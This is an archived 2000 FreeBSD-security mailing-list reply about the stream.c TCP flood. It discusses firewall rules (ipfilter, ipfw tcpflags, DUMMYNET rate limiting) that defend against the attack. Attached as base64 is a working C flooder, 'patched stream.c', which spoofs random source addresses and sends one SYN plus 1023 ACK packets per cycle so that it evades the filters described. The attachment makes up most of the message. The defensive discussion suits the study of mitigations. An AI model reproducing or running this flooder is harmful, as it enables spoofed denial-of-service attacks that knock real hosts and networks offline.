Date: Sat, 22 Jan 2000 13:41:35 +0300 From: Vladimir Dubrovin <vlad@sandy.ru> To: Tim Yardley <yardley@uiuc.edu> Cc: news@technotronic.com, bugtraq@securityfocus.com, freebsd-security@FreeBSD.ORG Subject: Re[2]: explanation and code for stream.c issues Message-ID: <0570.000122@sandy.ru> In-Reply-To: <4.2.0.58.20000121131202.0135ef10@students.uiuc.edu> References: <4.2.0.58.20000121131202.0135ef10@students.uiuc.edu>
next in thread | previous in thread | raw e-mail | index | archive | help
------------10D1AD2092C606B
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hello Tim Yardley,
21.01.00 22:15, you wrote: explanation and code for stream.c issues;
>>T> -- start rule set --
>>T> block in quick proto tcp from any to any head 100
>>T> pass in quick proto tcp from any to any flags S keep state group 100
>>T> pass in all
>>T> -- end rule set --
>>
>>Attack can be easily changed to send pair SYN and invalid SYN/ACK
My mistake here - SYN/ACK packet isn't required. Sorry, i wrote this
message after 11 hours of work.
Intruder sends SYN packet and then sends, lets say 1000 ACK packets to
the same port from same port and source address. SYN packet will open
ipfilter to pass all others packets. This attack doesn't need
randomization for each packet.
By the way - published stream.c doesn't use ACK bit at all.
packet.tcp.th_flags = 0;
It looks like usual flooder and can be easily filtered with ipfw by
blocking packets without any flags set (this packets are invalid for
TCP).
allow tcp from any to any tcpflags ack
allow tcp from any to any tcpflags syn
allow tcp from any to any tcpflags syn,ack
deny tcp from any to any
Attached is patched stream.c which sends (SYN packet + 1023 ACK
packets) from random port and source. This ipfw rule and published
ipfilter rule will be unusable against this attack. In my current
location i can't test it.
T> As was mentioned in the "advisory/explanation" on the issue, ipfw cannot
T> deal with the problem due to the fact that it is stateless.
T> The attack comes from random ip addresses, therefore throttling like that
T> only hurts your connection or solves nothing at all. In other words, the
T> random sourcing and method of the attack, makes a non-stateless firewall
T> useless.
It would be better if you reed the rule before answering. Of cause,
ipfw can't find invalid ACK packets. But if OS supports DUMMYNET
option ipfw can be used to limit the number of packets in a fixed
amount of time. In this case:
ipfw pipe 10 config delay 50 queue 500 packets
ipfw add pipe 10 tcp from any to $MYHOST in via $EXTERNAL
we limit router ro only allow 500 TCP packets in every 50ms. Average
size of tcp packet is approx. 500 bytes (you can test it). So, you
allow bandwidth of 40M pbs for standard TCP traffic. But this rule
will effectively block any spoofing attack which uses small packets.
If 50-bytes packets are used this rule will allow only bandwith 4M bps
for such attack. Not only "ACK" attack, but any flood. We didn't check
source, so we closed against any spoofing.
Of cause in this case you will loose TCP packets during an attack and
connections can be dropped, but at least your host will be safe. As it
was pointed, _any_ packet filter, including ipfilter, can't solve this
problem completely.
+=-=-=-=-=-=-=-=-=+
|Vladimir Dubrovin|
| Sandy Info, ISP |
+=-=-=-=-=-=-=-=-=+
------------10D1AD2092C606B
Content-Type: application/octet-stream; name="stream.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="stream.c"
I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8dW5pc3Rk
Lmg+DQojaW5jbHVkZSA8c3RyaW5ncy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVk
ZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2lmbmRlZiBfX1VTRV9C
U0QNCiNkZWZpbmUgX19VU0VfQlNEDQojZW5kaWYNCiNpZm5kZWYgX19GQVZPUl9CU0QNCiNkZWZp
bmUgX19GQVZPUl9CU0QNCiNlbmRpZg0KI2luY2x1ZGUgPG5ldGluZXQvaW5fc3lzdG0uaD4NCiNp
bmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pcC5oPg0KI2luY2x1ZGUg
PG5ldGluZXQvdGNwLmg+DQojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8bmV0ZGIu
aD4NCg0KI2lmZGVmIExJTlVYDQojZGVmaW5lIEZJWCh4KSAgaHRvbnMoeCkNCiNlbHNlDQojZGVm
aW5lIEZJWCh4KSAgKHgpDQojZW5kaWYNCg0Kc3RydWN0IGlwX2hkciB7DQogICAgdV9pbnQgICAg
ICAgaXBfaGw6NCwgICAgICAgICAgICAgICAgLyogaGVhZGVyIGxlbmd0aCBpbiAzMiBiaXQgd29y
ZHMgKi8NCiAgICAgICAgICAgICAgICBpcF92OjQ7ICAgICAgICAgICAgICAgICAvKiBpcCB2ZXJz
aW9uICovDQogICAgdV9jaGFyICAgICAgaXBfdG9zOyAgICAgICAgICAgICAgICAgLyogdHlwZSBv
ZiBzZXJ2aWNlICovDQogICAgdV9zaG9ydCAgICAgaXBfbGVuOyAgICAgICAgICAgICAgICAgLyog
dG90YWwgcGFja2V0IGxlbmd0aCAqLw0KICAgIHVfc2hvcnQgICAgIGlwX2lkOyAgICAgICAgICAg
ICAgICAgIC8qIGlkZW50aWZpY2F0aW9uICovDQogICAgdV9zaG9ydCAgICAgaXBfb2ZmOyAgICAg
ICAgICAgICAgICAgLyogZnJhZ21lbnQgb2Zmc2V0ICovDQogICAgdV9jaGFyICAgICAgaXBfdHRs
OyAgICAgICAgICAgICAgICAgLyogdGltZSB0byBsaXZlICovDQogICAgdV9jaGFyICAgICAgaXBf
cDsgICAgICAgICAgICAgICAgICAgLyogcHJvdG9jb2wgKi8NCiAgICB1X3Nob3J0ICAgICBpcF9z
dW07ICAgICAgICAgICAgICAgICAvKiBpcCBjaGVja3N1bSAqLw0KICAgIHVfbG9uZyAgICAgIHNh
ZGRyLCBkYWRkcjsgICAgICAgICAgIC8qIHNvdXJjZSBhbmQgZGVzdCBhZGRyZXNzICovDQp9Ow0K
DQpzdHJ1Y3QgdGNwX2hkciB7DQogICAgdV9zaG9ydCAgICAgdGhfc3BvcnQ7ICAgICAgICAgICAg
ICAgLyogc291cmNlIHBvcnQgKi8NCiAgICB1X3Nob3J0ICAgICB0aF9kcG9ydDsgICAgICAgICAg
ICAgICAvKiBkZXN0aW5hdGlvbiBwb3J0ICovDQogICAgdV9sb25nICAgICAgdGhfc2VxOyAgICAg
ICAgICAgICAgICAgLyogc2VxdWVuY2UgbnVtYmVyICovDQogICAgdV9sb25nICAgICAgdGhfYWNr
OyAgICAgICAgICAgICAgICAgLyogYWNrbm93bGVkZ2VtZW50IG51bWJlciAqLw0KICAgIHVfaW50
ICAgICAgIHRoX3gyOjQsICAgICAgICAgICAgICAgIC8qIHVudXNlZCAqLw0KICAgICAgICAgICAg
ICAgIHRoX29mZjo0OyAgICAgICAgICAgICAgIC8qIGRhdGEgb2Zmc2V0ICovDQogICAgdV9jaGFy
ICAgICAgdGhfZmxhZ3M7ICAgICAgICAgICAgICAgLyogZmxhZ3MgZmllbGQgKi8NCiAgICB1X3No
b3J0ICAgICB0aF93aW47ICAgICAgICAgICAgICAgICAvKiB3aW5kb3cgc2l6ZSAqLw0KICAgIHVf
c2hvcnQgICAgIHRoX3N1bTsgICAgICAgICAgICAgICAgIC8qIHRjcCBjaGVja3N1bSAqLw0KICAg
IHVfc2hvcnQgICAgIHRoX3VycDsgICAgICAgICAgICAgICAgIC8qIHVyZ2VudCBwb2ludGVyICov
DQp9Ow0KDQpzdHJ1Y3QgdGNwb3B0X2hkciB7DQogICAgdV9jaGFyICB0eXBlOyAgICAgICAgICAg
ICAgICAgICAgICAgLyogdHlwZSAqLw0KICAgIHVfY2hhciAgbGVuOyAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgLyogbGVuZ3RoICovDQogICAgdV9zaG9ydCB2YWx1ZTsgICAgICAgICAg
ICAgICAgICAgICAgLyogdmFsdWUgKi8NCn07DQoNCnN0cnVjdCBwc2V1ZG9faGRyIHsgICAgICAg
ICAgICAgICAgICAgICAvKiBTZWUgUkZDIDc5MyBQc2V1ZG8gSGVhZGVyICovDQogICAgdV9sb25n
IHNhZGRyLCBkYWRkcjsgICAgICAgICAgICAgICAgICAgICAgICAvKiBzb3VyY2UgYW5kIGRlc3Qg
YWRkcmVzcyAqLw0KICAgIHVfY2hhciBtYnosIHB0Y2w7ICAgICAgICAgICAgICAgICAgIC8qIHpl
cm8gYW5kIHByb3RvY29sICovDQogICAgdV9zaG9ydCB0Y3BsOyAgICAgICAgICAgICAgICAgICAg
ICAgLyogdGNwIGxlbmd0aCAqLw0KfTsNCg0Kc3RydWN0IHBhY2tldCB7DQogICAgc3RydWN0IGlw
LypfaGRyKi8gaXA7DQogICAgc3RydWN0IHRjcGhkciB0Y3A7DQovKiBzdHJ1Y3QgdGNwb3B0X2hk
ciBvcHQ7ICovDQp9Ow0KDQpzdHJ1Y3QgY2tzdW0gew0KICAgIHN0cnVjdCBwc2V1ZG9faGRyIHBz
ZXVkbzsNCiAgICBzdHJ1Y3QgdGNwaGRyIHRjcDsNCn07DQoNCnN0cnVjdCBwYWNrZXQgcGFja2V0
Ow0Kc3RydWN0IGNrc3VtIGNrc3VtOw0Kc3RydWN0IHNvY2thZGRyX2luIHNfaW47DQp1X3Nob3J0
IGRzdHBvcnQsIHBrdHNpemUsIHBwczsNCnVfbG9uZyBkc3RhZGRyOw0KaW50IHNvY2s7DQoNCnZv
aWQgdXNhZ2UoY2hhciAqcHJvZ25hbWUpDQp7DQogICAgZnByaW50ZihzdGRlcnIsICJVc2FnZTog
JXMgPGRzdGFkZHI+IDxkc3Rwb3J0PiA8cGt0c2l6ZT4gPHBwcz5cbiIsIA0KcHJvZ25hbWUpOw0K
ICAgIGZwcmludGYoc3RkZXJyLCAiICAgIGRzdGFkZHIgIC0gdGhlIHRhcmdldCB3ZSBhcmUgdHJ5
aW5nIHRvIGF0dGFjay5cbiIpOw0KICAgIGZwcmludGYoc3RkZXJyLCAiICAgIGRzdHBvcnQgIC0g
dGhlIHBvcnQgb2YgdGhlIHRhcmdldCwgMCA9IHJhbmRvbS5cbiIpOw0KICAgIGZwcmludGYoc3Rk
ZXJyLCAiICAgIHBrdHNpemUgIC0gdGhlIGV4dHJhIHNpemUgdG8gdXNlLiAgMCA9IG5vcm1hbCAN
CnN5bi5cbiIpOw0KICAgIGV4aXQoMSk7DQp9DQoNCi8qIFRoaXMgaXMgYSByZWZlcmVuY2UgaW50
ZXJuZXQgY2hlY2tzdW0gaW1wbGltZW50YXRpb24sIG5vdCB2ZXJ5IGZhc3QgKi8NCmlubGluZSB1
X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKmFkZHIsIGludCBsZW4pDQp7DQogICAgcmVnaXN0ZXIg
aW50IG5sZWZ0ID0gbGVuOw0KICAgIHJlZ2lzdGVyIHVfc2hvcnQgKncgPSBhZGRyOw0KICAgIHJl
Z2lzdGVyIGludCBzdW0gPSAwOw0KICAgIHVfc2hvcnQgYW5zd2VyID0gMDsNCg0KICAgICAvKiBP
dXIgYWxnb3JpdGhtIGlzIHNpbXBsZSwgdXNpbmcgYSAzMiBiaXQgYWNjdW11bGF0b3IgKHN1bSks
IHdlIGFkZA0KICAgICAgKiBzZXF1ZW50aWFsIDE2IGJpdCB3b3JkcyB0byBpdCwgYW5kIGF0IHRo
ZSBlbmQsIGZvbGQgYmFjayBhbGwgdGhlDQogICAgICAqIGNhcnJ5IGJpdHMgZnJvbSB0aGUgdG9w
IDE2IGJpdHMgaW50byB0aGUgbG93ZXIgMTYgYml0cy4gKi8NCg0KICAgICB3aGlsZSAobmxlZnQg
PiAxKSAgew0KICAgICAgICAgc3VtICs9ICp3Kys7DQogICAgICAgICBubGVmdCAtPSAyOw0KICAg
ICB9DQoNCiAgICAgLyogbW9wIHVwIGFuIG9kZCBieXRlLCBpZiBuZWNlc3NhcnkgKi8NCiAgICAg
aWYgKG5sZWZ0ID09IDEpIHsNCiAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2No
YXIgKikgdzsNCiAgICAgICAgIHN1bSArPSBhbnN3ZXI7DQogICAgIH0NCg0KICAgICAvKiBhZGQg
YmFjayBjYXJyeSBvdXRzIGZyb20gdG9wIDE2IGJpdHMgdG8gbG93IDE2IGJpdHMgKi8NCiAgICAg
c3VtID0gKHN1bSA+PiAxNikgKyAoc3VtICYgMHhmZmZmKTsgLyogYWRkIGhpIDE2IHRvIGxvdyAx
NiAqLw0KICAgICBzdW0gKz0gKHN1bSA+PiAxNik7ICAgICAgICAgICAgICAgIC8qIGFkZCBjYXJy
eSAqLw0KICAgICBhbnN3ZXIgPSB+c3VtOyAgICAgICAgICAgICAgICAgICAgIC8qIHRydW5jYXRl
IHRvIDE2IGJpdHMgKi8NCiAgICAgcmV0dXJuKGFuc3dlcik7DQp9DQoNCnVfbG9uZyBsb29rdXAo
Y2hhciAqaG9zdG5hbWUpDQp7DQogICAgc3RydWN0IGhvc3RlbnQgKmhwOw0KDQogICAgaWYgKCho
cCA9IGdldGhvc3RieW5hbWUoaG9zdG5hbWUpKSA9PSBOVUxMKSB7DQogICAgICAgZnByaW50Zihz
dGRlcnIsICJDb3VsZCBub3QgcmVzb2x2ZSAlcy5cbiIsIGhvc3RuYW1lKTsNCiAgICAgICBleGl0
KDEpOw0KICAgIH0NCg0KICAgIHJldHVybiAqKHVfbG9uZyAqKWhwLT5oX2FkZHI7DQp9DQoNCg0K
dm9pZCBmbG9vZGVyKHZvaWQpDQp7DQogICAgc3RydWN0IHRpbWVzcGVjIHRzOw0KICAgIGludCBp
Ow0KDQoNCiAgICBtZW1zZXQoJnBhY2tldCwgMCwgc2l6ZW9mKHBhY2tldCkpOw0KDQogICAgdHMu
dHZfc2VjICAgICAgICAgICAgICAgICAgID0gMDsNCiAgICB0cy50dl9uc2VjICAgICAgICAgICAg
ICAgICAgPSAxMDsNCg0KICAgIHBhY2tldC5pcC5pcF9obCAgICAgICAgICAgICA9IDU7DQogICAg
cGFja2V0LmlwLmlwX3YgICAgICAgICAgICAgID0gNDsNCiAgICBwYWNrZXQuaXAuaXBfcCAgICAg
ICAgICAgICAgPSBJUFBST1RPX1RDUDsNCiAgICBwYWNrZXQuaXAuaXBfdG9zICAgICAgICAgICAg
PSAweDA4Ow0KICAgIHBhY2tldC5pcC5pcF9pZCAgICAgICAgICAgICA9IHJhbmQoKTsNCiAgICBw
YWNrZXQuaXAuaXBfbGVuICAgICAgICAgICAgPSBGSVgoc2l6ZW9mKHBhY2tldCkpOw0KICAgIHBh
Y2tldC5pcC5pcF9vZmYgICAgICAgICAgICA9IDA7IC8qIElQX0RGPyAqLw0KICAgIHBhY2tldC5p
cC5pcF90dGwgICAgICAgICAgICA9IDI1NTsNCiAgICBwYWNrZXQuaXAuaXBfZHN0LnNfYWRkciAg
ICAgPSByYW5kb20oKTsNCg0KICAgIHBhY2tldC50Y3AudGhfZmxhZ3MgICAgICAgICA9IDA7DQog
ICAgcGFja2V0LnRjcC50aF93aW4gICAgICAgICAgID0gaHRvbnMoMTYzODQpOw0KICAgIHBhY2tl
dC50Y3AudGhfc2VxICAgICAgICAgICA9IHJhbmRvbSgpOw0KICAgIHBhY2tldC50Y3AudGhfYWNr
ICAgICAgICAgICA9IDA7DQogICAgcGFja2V0LnRjcC50aF9vZmYgICAgICAgICAgID0gNTsgLyog
NSAqLw0KICAgIHBhY2tldC50Y3AudGhfdXJwICAgICAgICAgICA9IDA7DQogICAgcGFja2V0LnRj
cC50aF9kcG9ydCAgICAgICAgID0gZHN0cG9ydD9odG9ucyhkc3Rwb3J0KTpyYW5kKCk7DQoNCi8q
DQogICAgcGFja2V0Lm9wdC50eXBlICAgICAgICAgICAgID0gMHgwMjsNCiAgICBwYWNrZXQub3B0
LmxlbiAgICAgICAgICAgICAgPSAweDA0Ow0KICAgIHBhY2tldC5vcHQudmFsdWUgICAgICAgICAg
ICA9IGh0b25zKDE0NjApOw0KKi8NCg0KDQogICAgY2tzdW0ucHNldWRvLmRhZGRyICAgICAgICAg
ID0gZHN0YWRkcjsNCiAgICBja3N1bS5wc2V1ZG8ubWJ6ICAgICAgICAgICAgPSAwOw0KICAgIGNr
c3VtLnBzZXVkby5wdGNsICAgICAgICAgICA9IElQUFJPVE9fVENQOw0KICAgIGNrc3VtLnBzZXVk
by50Y3BsICAgICAgICAgICA9IGh0b25zKHNpemVvZihzdHJ1Y3QgdGNwaGRyKSk7DQoNCiAgICBz
X2luLnNpbl9mYW1pbHkgICAgICAgICAgICAgPSBBRl9JTkVUOw0KICAgIHNfaW4uc2luX2FkZHIu
c19hZGRyICAgICAgICAgICAgICAgID0gZHN0YWRkcjsNCiAgICBzX2luLnNpbl9wb3J0ICAgICAg
ICAgICAgICAgPSBwYWNrZXQudGNwLnRoX2Rwb3J0Ow0KDQogICAgZm9yKGk9MDs7KytpKSB7DQov
KiANCglwYXRjaGVkIGJ5IDNBUEEzQSB0byBzZW5kIDEgc3luIHBhY2tldCArIDEwMjMgQUNLIHBh
Y2tldHMuIA0KDQoqLw0KICAgIGlmKCAhKGkmMHg0RkYpICkgew0KCXBhY2tldC50Y3AudGhfc3Bv
cnQgPSByYW5kKCk7DQoJY2tzdW0ucHNldWRvLnNhZGRyID0gcGFja2V0LmlwLmlwX3NyYy5zX2Fk
ZHIgPSByYW5kb20oKTsNCglwYWNrZXQudGNwLnRoX2ZsYWdzID0gVEhfU1lOOw0KICAgICAgICBw
YWNrZXQudGNwLnRoX2FjayAgICAgICAgICAgPSAwOw0KDQogICAgfQ0KICAgIGVsc2Ugew0KCXBh
Y2tldC50Y3AudGhfZmxhZ3MgPSBUSF9BQ0s7DQoJcGFja2V0LnRjcC50aF9hY2sgPSByYW5kb20o
KTsNCiAgICB9DQoNCg0KICAgIC8qIGNrc3VtLnBzZXVkby5zYWRkciA9IHBhY2tldC5pcC5pcF9z
cmMuc19hZGRyID0gcmFuZG9tKCk7ICovDQogICAgICAgKytwYWNrZXQuaXAuaXBfaWQ7DQogICAg
ICAgLyorK3BhY2tldC50Y3AudGhfc3BvcnQqLzsNCiAgICAgICArK3BhY2tldC50Y3AudGhfc2Vx
Ow0KDQogICAgICAgaWYgKCFkc3Rwb3J0KQ0KICAgICAgICAgIHNfaW4uc2luX3BvcnQgPSBwYWNr
ZXQudGNwLnRoX2Rwb3J0ID0gcmFuZCgpOw0KDQogICAgICAgcGFja2V0LmlwLmlwX3N1bSAgICAg
ICAgID0gMDsNCiAgICAgICBwYWNrZXQudGNwLnRoX3N1bSAgICAgICAgICAgICAgICA9IDA7DQoN
CiAgICAgICBja3N1bS50Y3AgICAgICAgICAgICAgICAgICAgICAgICA9IHBhY2tldC50Y3A7DQoN
CiAgICAgICBwYWNrZXQuaXAuaXBfc3VtICAgICAgICAgPSBpbl9ja3N1bSgodm9pZCAqKSZwYWNr
ZXQuaXAsIDIwKTsNCiAgICAgICBwYWNrZXQudGNwLnRoX3N1bSAgICAgICAgICAgICAgICA9IGlu
X2Nrc3VtKCh2b2lkICopJmNrc3VtLCBzaXplb2YoY2tzdW0pKTsNCg0KICAgICAgIGlmIChzZW5k
dG8oc29jaywgJnBhY2tldCwgc2l6ZW9mKHBhY2tldCksIDAsIChzdHJ1Y3Qgc29ja2FkZHIgDQoq
KSZzX2luLCBzaXplb2Yoc19pbikpIDwgMCkNCiAgICAgICAgICBwZXJyb3IoImplc3MiKTsNCg0K
ICAgIH0NCn0NCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCnsNCiAgICBpbnQg
b24gPSAxOw0KDQogICAgcHJpbnRmKCJzdHJlYW0uYyB2MS4wIC0gVENQIFBhY2tldCBTdG9ybVxu
Iik7DQoNCiAgICBpZiAoKHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19SQVcsIElQUFJPVE9f
UkFXKSkgPCAwKSB7DQogICAgICAgcGVycm9yKCJzb2NrZXQiKTsNCiAgICAgICBleGl0KDEpOw0K
ICAgIH0NCg0KICAgIHNldGdpZChnZXRnaWQoKSk7IHNldHVpZChnZXR1aWQoKSk7DQoNCiAgICBp
ZiAoYXJnYyA8IDQpDQogICAgICAgdXNhZ2UoYXJndlswXSk7DQoNCiAgICBpZiAoc2V0c29ja29w
dChzb2NrLCBJUFBST1RPX0lQLCBJUF9IRFJJTkNMLCAoY2hhciAqKSZvbiwgc2l6ZW9mKG9uKSkg
PCANCjApIHsNCiAgICAgICBwZXJyb3IoInNldHNvY2tvcHQiKTsNCiAgICAgICBleGl0KDEpOw0K
ICAgIH0NCg0KICAgIHNyYW5kKCh0aW1lKE5VTEwpIF4gZ2V0cGlkKCkpICsgZ2V0cHBpZCgpKTsN
Cg0KICAgIHByaW50ZigiXG5SZXNvbHZpbmcgSVBzLi4uIik7IGZmbHVzaChzdGRvdXQpOw0KDQog
ICAgZHN0YWRkciAgICAgPSBsb29rdXAoYXJndlsxXSk7DQogICAgZHN0cG9ydCAgICAgPSBhdG9p
KGFyZ3ZbMl0pOw0KICAgIHBrdHNpemUgICAgID0gYXRvaShhcmd2WzNdKTsNCg0KICAgIHByaW50
ZigiU2VuZGluZy4uLiIpOyBmZmx1c2goc3Rkb3V0KTsNCg0KICAgIGZsb29kZXIoKTsNCg0KICAg
IHJldHVybiAwOw0KfQ0K
------------10D1AD2092C606B--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?0570.000122>